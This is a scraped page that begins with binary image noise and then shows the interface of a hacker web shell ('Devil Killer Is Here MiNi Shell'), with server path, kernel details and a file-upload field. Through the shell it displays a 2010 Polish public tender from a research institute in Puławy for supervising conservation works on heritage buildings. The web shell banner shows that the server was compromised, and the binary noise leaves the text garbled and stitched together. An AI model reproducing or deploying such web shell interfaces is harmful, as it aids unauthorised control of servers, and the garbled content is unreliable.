JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100723/222032-N-2010.html

<p class="kh_header"><b>Puławy: Pełnienie nadzoru inwestorskiego dla obiektów usytuowanych na terenie osady pałacowo parkowej IUNG - PIB</b><br>
<b>Numer ogłoszenia: 222032 - 2010; data zamieszczenia: 23.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy , ul. Czartoryskich 8, 24-100 Puławy, woj. lubelskie, tel. 081 8863421 w.393, faks 081 8864547.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iung.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego dla obiektów usytuowanych na terenie osady pałacowo parkowej IUNG - PIB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego w czasie trwania 2 projektów (Remont Konserwatorski Świątyni Sybilli i Domu Gotyckiego w Puławach oraz Rewaloryzację i konserwację Domku Żółtego i części Pałacu ks. Czartoryskich 
w Puławach ) realizowanych przez Instytut Uprawy nawożenia i Gleboznawstwa Państwowy Instytut Badawczy. Zamówienie składa się z  trzech części: 

Część I pełnienie nadzoru inwestorskiego dla projektu Remont Konserwatorski Świątyni Sybilli i Domu Gotyckiego w Puławach, który będzie polegał na :
1)Remont Konserwatorski Świątyni Sybilli w Puławach 
Zakres prac które musi wykonać wykonawca robót :
a)Prace remontowo budowlane
b)Remont ścian przyziemia 
c)Remont i wzmocnienie ścian oraz tynki renowacyjne,
d)Remont tarasu,
e)Remont ceramicznych powierzchni      ścian zewnętrznych
f)Remont dachu,
g)Roboty kamieniarskie,
h)Opaska zabezpieczająca i odprowadzenie wód opadowych
i)Remontu konserwatorski elewacji i stolarki
j)Renowacja i konserwacja elementów kamiennych
k)Renowacja stolarki drzwiowej
l)Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego).

Powyższy zakres prac został szczegółowo określony w opisie przedmiotu zamówienia, inwestorskich przedmiarach robót , projektach budowlanych (opis i rysunki)  specyfikacjach wykonania robót oraz Pozwoleniach na budowę 
2)Remont Konserwatorski Domu Gotyckiego w Puławach
 Zakres prac które musi wykonać wykonawca robót :
a)Prace remontowo budowlane
b)Hydroizolacja ścian fundamentowych
c)Remont i wzmocnienie ścian zewnętrznych,
d)Remont tarasu,
e)Remont dachu,
f)Cokół kamienny i zewnętrzna posadzka
g)Projekt remontu konserwatorskiego elewacji i stolarki
h)Renowacja tynków zewnętrznych i detali architektonicznych
i)Renowacja i konserwacja elementów kamiennych
j)Renowacja stolarki okiennej i drzwiowej
k)Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego)
Powyższy zakres prac został szczegółowo określony w opisie przedmiotu zamówienia, inwestorskich przedmiarach robót , projektach budowlanych (opis i rysunki)  specyfikacjach wykonania robót oraz Pozwoleniach na budowę 

Część  II : pełnienie nadzoru inwestorskiego dla projektu Rewaloryzację i konserwację Domku Żółtego i części Pałacu ks. Czartoryskich w Puławach
1)Rewaloryzacja i konserwacja Domku Żółtego  
Zakres prac które musi wykonać wykonawca robót :
a.Prace remontowo budowlane
b.Remont ścian przyziemia 
c.Remont i wzmocnienie ścian oraz tynki renowacyjne,
d.Remont tarasu,
e.Remont dachu,
f.Roboty kamieniarskie,
g.Opaska zabezpieczająca i odprowadzenie wód opadowych
h.Remontu konserwatorski elewacji i stolarki
i.Renowacja i konserwacja elementów kamiennych
j.Renowacja stolarki drzwiowej
k.Wymiana stolarki okiennej
l.Wykonanie instalacji sanitarnych ( wod- kan, co., cw., wentylacja)
m.Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego).
Powyższy zakres prac został szczegółowo określony w opisie przedmiotu zamówienia, inwestorskich przedmiarach robót , projektach budowlanych (opis i rysunki)  specyfikacjach wykonania robót oraz Pozwoleniach na budowę 

2)Rewaloryzacja i konserwacja części Pałacu ks. Czartoryskich ( Sala Rycerska, Główna klatka schodowa, Sala kamienna, Sala Gotycka, Sień Główna )
  Zakres prac które musi wykonać wykonawca robót :
a)Prace remontowo budowlane
b)Konserwacja wystroju sztukatorskiego ścian i sufitów 
c)Konserwacja drewnianych drzwi wraz z ościeżami 
d)Wymiana posadzek drewnianych 
e)Konserwacja elementów kamiennych 
f)Konserwacja kamiennych posadzek
g)Wymiana drewnianych okładzin schodowych
h)Renowacja stolarki okiennej 
i)Oczyszczenie z farb malarskich wraz z uzupełnieniem o brakujące elementy żeliwnej konstrukcji klatki schodowej
j)Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego)

Powyższy zakres prac został szczegółowo określony w opisie przedmiotu zamówienia, inwestorskich przedmiarach robót , projektach budowlanych (opis i rysunki)  specyfikacjach wykonania robót oraz Pozwoleniach na budowę 


Część III pełnienie nadzoru inwestorskiego w czasie instalacji systemów zabezpieczeń i monitoringu. 
 Zakres prac które musi wykonać wykonawca robót :
1)Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego) dla:
a)Świątyni Sybilli i Domu Gotyckiego 
b)Domku Żółtego i części Pałacu ks. Czartoryskich w Puławach
2)Zamontowanie systemów monitoringu dla:
a)Świątyni Sybilli i Domu Gotyckiego 
b)Domku Żółtego i części Pałacu ks. Czartoryskich w Puławach
 
Szczegółowy zakres prac został określony w opisie przedmiotu zamówienia oraz inwestorski przedmiar robót

2.Zadania nadzoru inwestorskiego w czasie realizacji  umowy.
1)Podstawowe obowiązki i uprawnienia inspektora oraz formalno-prawne podstawy do jego działalności określają art. 17 i 18 oraz art. 25 i 26 ustawy  z 7 lipca 1994r Prawo budowlane z póź. zmianami oraz kontrolowanie rozliczeń budowy.
2)Prace będą prowadzone w obiektach zabytkowych i winny być wykonywane zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca ( dz. U. nr 150, poz.1579 ) w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych oraz ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami( Dz. U. Nr 162 poz. 1568,oraz z dnia 2004 r. nr 96, poz. 959 z późn. zm.) a także zgodnie z ustawa z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. Nr 106/00 poz. 1126 z późn zm. )
3)Inspektor reprezentuje interesy zamawiającego na budowie poprzez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, specyfikacjami technicznymi, przepisami ( w tym prawa budowlanego), zasadami wiedzy technicznej oraz postanowieniami warunków umowy.
4)Inspektor wypełnia obowiązki  i odpowiada za wszelkie decyzje, które podejmuje w ramach kompetencji określonych szczegółowo w niniejszym opisie przedmiotu zamówienia oraz  specyfikacjach technicznych.

3.Do obowiązków  inspektora nadzoru w szczególności należy:
1)zapoznanie się z dokumentacją techniczno-prawną , terenem budowy, jego uzbrojeniem i zagospodarowaniem,
2)udział w protokolarnym przekazaniu placu budowy,
3)sprawdzenie wytyczenia przez wykonawcę robót, sprawdzenie innych pomiarów sytuacyjno-wysokościowych,
4)organizacja prac związanych z nadzorem w celu uniknięcia zbędnych przerw w realizacji robót przez wykonawcę,
5)kontrolowanie przestrzegania przez wykonawcę zasad BHP,
6)zajmowanie stanowiska co do sposobu zabezpieczenia wszelkich wykopalisk odkrytych przez wykonawcę na placu budowy,
7)akceptacja urządzeń zabezpieczających rejon robót, a także treści i miejsca ustawienia tablic informacyjnych budowy i ustalania długości odcinków roboczych wyłączonych  z ruchu,
8)prowadzenie systematycznej kontroli zgodności cech jakościowych elementów robót i materiałów z wymaganiami specyfikacji technicznych oraz dokumentacji projektowych - w oparciu o wyniki badań tych cech, dostarczonych przez wykonawcę,
9)kontrola zgodności receptur i technologii  z wymaganiami specyfikacji technicznych,
10)akceptacja wszystkich materiałów stosowanych do przebudowy, pod kątem ich 
rodzaju , jakości, cech i źródeł pochodzenia,
11)kontrola i ocena przedkładanych świadectw jakościowych oraz atestów na materiały elementy sprowadzane z zewnątrz,
13)egzekwowanie od wykonawcy dodatkowych badań i pomiarów, względnie przeprowadzenia badań niezależnych - w przypadku wątpliwości co do wiarygodności badań wykonawcy,
14)kontrolowanie sposobu składowania i przechowywania materiałów oraz uporządkowania miejsc składowania po zakończeniu robót,
15)dokonywanie odbiorów robót zanikających i ulegających zakryciu - w terminie  7 dni od daty zgłoszenia o odbiorze przez Wykonawcę
16)uczestniczenie w czynnościach odbioru ostatecznego,
17)sprawdzenie kompletności  przedstawionych przez wykonawcę dokumentów i oświadczeń niezbędnych do przeprowadzenia odbiorów
18)sprawdzenie zakresu rzeczowego robót przez udział w obmiarach na gruncie,
19)potwierdzanie  w dzienniku budowy  gotowości robót do odbioru ostatecznego
20)powiadomienie Zamawiającego o gotowości robót do odbioru  ostatecznego,
21)sprawdzenie ostatecznego rozliczenia robót (w tym ustalenie ew. potrąceń za wady trwałe w uzgodnieniu z zamawiającym),
22)kontrola prawidłowości prowadzenia dziennika budowy i dokonywania  w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót
23)rozstrzyganie w porozumieniu z kierownikiem budowy i przedstawicielem inwestora wątpliwości natury technicznej powstałe w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu budowlanego,
24)przebywanie inspektora na terenie budowy (ilość pobytów na budowie w celu realizacji zamówienia została ustalona poniżej ),
25) składanie i opiniowanie wniosków dotyczących robót,
26)nadzór nad  zabezpieczeniem przez wykonawcę terenu budowy w przypadku wypowiedzenia umowy,
27)rozliczenie zakresu umowy w przypadku jej wypowiedzenia,
28)do obowiązków  inspektora nadzoru należy  sprawdzenie pod względem ilościowym nakładów rzeczowych i zastosowanych cen wszystkich kosztorysów dodatkowych, zamiennych, uzupełniających sporządzonych w trakcie realizacji zamówienia przez wykonawcę robót,
29)dokumentowanie wszelkich zmian, które zostały wprowadzone w trakcie realizacji  w dokumentacji projektowej  i przekazanie zamawiającemu w dniu odbioru ostatecznego,
30)w przypadku dokonywania ustaleń ustnych związanych z realizacją robót inspektor nadzoru zobowiązany jest w terminie 2 dni do sporządzenia protokołu w formie pisemnej i uzyskania podpisów uczestników ustaleń,
31)kierownik zespołu nadzoru - inspektor nadzoru robót budowlano remontowych lub  instalacji systemów zabezpieczeń  i nadzoruje właściwe pełnienie obowiązków przez inspektora nadzoru o specjalności elektrycznej - w przypadku zadania nr 1,
32)składanie bieżących informacji inwestorowi  o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji robót wynikających z zatwierdzonego przez zleceniodawcę harmonogramu robót,
33)proponowanie rozwiązań zamiennych w stosunku do projektowanych w dokumentacji projektowej nie wymagających dodatkowych kosztów i zmiany terminowości wykonania zadania a podnoszących trwałość i funkcjonalność inwestycji.
Wszelkie odstępstwa od zgodności realizacji robót z dokumentacją projektową i specyfikacjami technicznymi wymagają zgody zamawiającego przed ich wykonaniem. Wykonanie robót przekraczających zakres rzeczowy ustalony w dokumentacji projektowej wymaga akceptacji zamawiającego przed ich wykonaniem,

4. Zadania nadzoru inwestorskiego w czasie trwania okresu rękojmi-gwarancji.
1. Inspektor nadzoru zobowiązany jest do wykonywania w okresie rękojmi- gwarancji corocznych przeglądów z udziałem  inwestora i wykonawcy wykonanych robót i przekazania zamawiającemu protokołu  oceniającego stan obiektu (występujących ewentualnych wadach lub usterkach) z punktu widzenia warunków gwarancji   na 1 miesiąc przed upływem każdego kolejnego roku liczonego od daty odbioru ostatecznego.
2. Nadzorowanie realizacji robót  związanych z usuwaniem wad zaistniałych w okresie rękojmi-gwarancji i poświadczenia ich wykonania.
3. Potwierdzenie ostatecznego rozliczenia robót po okresie rękojmi/gwarancji.

5.lość pobytów na budowie potrzeba do realizacji zamówienia dla:
1)Części I - pełnienie nadzoru inwestorskiego dla projektu Remont Konserwatorski Świątyni Sybilli i Domu Gotyckiego w Puławach
a)2 razy w tygodniu dotyczy robót ogólnobudowlanych ( czyli  około 200 pobytów w trakcie realizacji zamówienia)
b)1 razy w tygodniu w trakcie realizacji robót instalacji elektrycznych( czyli  około 16 pobytów w trakcie realizacji zamówienia) 
2)Części II - pełnienie nadzoru inwestorskiego dla projektu Rewaloryzacja i konserwacja Domku Żółtego i części Pałacu ks. Czartoryskich w Puławach
a)2 razy w tygodniu dotyczy robót ogólnobudowlanych ( czyli  około 192 pobytów w trakcie realizacji zamówienia)
b)1 razy w tygodniu w trakcie realizacji robót instalacji elektrycznych( czyli  około 16 pobytów w trakcie realizacji zamówienia) 
c)1 razy w tygodniu w trakcie realizacji robót instalacji elektrycznych część 
( czyli  około 16 pobytów w trakcie realizacji zamówienia) 
d)1 razy w tygodniu w trakcie realizacji robót instalacji sanitarnych ( c.o, wod- Kan, ccw). Dotyczy tylko  Domeku Żółtego ( czyli  około 16 pobytów w trakcie realizacji zamówienia)
3)Części III - pełnienie nadzoru inwestorskiego w czasie  instalacji systemów zabezpieczeń i monitoringu:
a)Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego) - 8 pobytów w trakcie realizacji robót 
b) Zamontowanie systemów monitoringu - 8 pobytów w trakcie realizacji robót

 Częstsze pobyty na budowie w zależności od potrzeb lub życzenia inwestora lub kierownika budowy. Wszystkie pobyty na budowie muszą być udokumentowane wpisami do dziennika budowy, inspektor nadzoru zobowiązany jest do bezpośredniego uczestniczenia i nadzorowania w istotnych dla właściwej realizacji elementów robót. Inspektor nadzoru zobowiązany jest do zgłoszenia się na budowie w celu odbioru lub kontroli robót nie później niż w ciągu 24 godzin od telefonicznego powiadomienia przez wykonawcę robót lub zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy(załącznik Nr 1), Wypełniony formularz cenowy załączniku Nr 2),Pełnomocnictwo do reprezentowania wykonawcy o ile ofertę składa pełnomocnik, Oświadczenie w trybie art.22 ust.1 Ustawy Pzp (załącznika Nr 3), Oświadczenie wykonawcy o braku podstaw do wykluczenia na podstawie art. 24 ust.1 ustawy (załącznika Nr 4)Wykaz podwykonawców którym Wykonawca zamierza powierzyć wykonanie części  zamówienia- wg załącznika Nr 8 do SIWZ (jeżeli dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany istotnych postanowień  zawartej umowy ( art. 144 Pzp.)  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegające na: 
1)zmianie terminu zakończenia nadzoru inwestorskiego w przypadku przedłużenia roboty podstawowej przez wykonawcę :
a)spowodowanej warunkami atmosferycznymi - w przypadku wystąpienia klęski żywiołowej lub gdy warunki atmosferyczne odbiegają od warunków określonych w specyfikacji technicznej wykonania i odbioru robót budowlanych i uniemożliwiają prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów,
b)spowodowanej warunkami geologicznymi, wystąpieniem wykopalisk i odkryć archeologicznych oraz o znaczeniu  historycznym, bądź wystąpieniem niewybuchów, niewypałów uniemożliwiających prowadzenie robót; wszystkie przedmioty o znaczeniu historycznym lub też przedstawiające znaczną wartość odkryte na terenie budowy, będą przekazane pod opiekę konserwatora zabytków; Wykonawca niezwłocznie zabezpieczy znaleziska przed osobami trzecimi; Wykonawca niezwłocznie powiadomi inspektora nadzoru o takich odkryciach i wykona jego polecenia, co do obchodzenia się z nimi i dalszego trybu postępowania.
c) Zamawiający dopuszcza również możliwość skrócenia terminów realizacji zamówienia( nadzorów inwestorskich) w momencie szybszej realizacji wskazanych powyżej zadań inwestycyjnych prze Wykonawcę.  
2) zmianie dotyczącej zakresu robót i wynagrodzenia, jeżeli wystąpią: 
a) okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane roboty pozostaje w takim stosunku do umownego wynagrodzenia, w jakim wykonane roboty budowlane pozostają do całości robót określonych umową; 
3) zmianie osobowej: zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ lub zmiana - za zgodą Zamawiającego, podwykonawców nie wskazanych w ofercie (lub zakresu wskazanego w ofercie jako planowany do powierzenia podwykonawcom); zmiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia podwykonawców wynikającej z przepisów prawa i SIWZ,
5) zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Zarządzającej dotyczących realizacji projektu,
6)   zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego Strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań; jeżeli wykonanie umowy jest niemożliwe z powodu siły wyższej to inspektor nadzoru zaświadczy, że wykonanie umowy jest niemożliwe; Wykonawca zabezpieczy teren budowy tak szybko jak jest to możliwe i wstrzyma roboty, a Zamawiający zapłaci wynagrodzenie za wykonane roboty; 
7) zamawiający dopuszcza zmianę ceny zamówienia brutto (ceny ofertowej) w przypadku urzędowej zmiany stawki podatku VAT. Stawka podatku VAT określana jest zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2004 r. Nr 54 poz. 535, z późn. zm.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iung.pulawy.pl<br>
